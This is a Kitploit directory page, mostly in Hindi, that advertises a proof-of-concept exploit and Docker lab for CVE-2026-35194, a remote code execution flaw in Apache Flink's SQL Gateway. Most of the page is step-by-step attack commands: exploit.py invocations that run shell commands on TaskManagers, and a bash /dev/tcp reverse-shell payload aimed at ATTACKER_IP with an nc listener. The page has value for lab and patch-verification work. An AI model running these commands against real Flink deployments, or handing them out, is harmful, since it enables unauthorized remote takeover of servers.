Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/dexsemon/cve-2026-35194
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंटलैब और अभ्यास
GitHubdexsemon/cve-2026-35194

CVE-2026-35194

CVE-2026-35194 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट और Docker लैब, जो एक Apache Flink SQL कोड इंजेक्शन है जो SQL Gateway REST API के माध्यम से TaskManagers पर रिमोट कोड एक्ज़ीक्यूशन को सक्षम बनाता है।

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-35194 — Apache Flink SQL कोड इंजेक्शन

SQL कोड जनरेशन इंजेक्शन के माध्यम से Apache Flink TaskManagers पर रिमोट कोड एक्ज़ीक्यूशन।

CVECVE-2026-35194
CVSS8.1 (High)
CWECWE-94 — Code Injection
AffectedFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
Fixed1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
Attack SurfaceSQL Gateway REST API (default port 8083, no auth)

Quick Start

1. Deploy Vulnerable Lab

root@kitploit:~
docker compose up -d

क्लस्टर शुरू होने के लिए ~30s प्रतीक्षा करें। दो सेवाएँ शुरू होती हैं:

  • Flink Web UI — http://localhost:8081
  • SQL Gateway REST API — http://localhost:8083

सत्यापित करें:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Should return version "1.20.3"

2. Install Dependencies

root@kitploit:~
pip install requests

3. Exploit

JSON vector:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

LIKE vector:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

Version check only (no RCE):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

Verify RCE on TaskManager:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. Reverse Shell

root@kitploit:~
# Terminal 1 — listener
nc -lvnp 4444

# Terminal 2 — exploit
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Usage

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

Options:
  target              Target host (IP or hostname)
  -p, --port          SQL Gateway port (default: 8083)
  -c, --command       Shell command to run on TaskManager
  -v, --vector        json (default) or like
  --check-only        Version check only, no exploit
  -t, --timeout       Request timeout in seconds (default: 30)
  --cert / --key      Client cert + key for mTLS environments
  --ssl               Force HTTPS

Disclaimer

केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए।

टूल डाउनलोड करें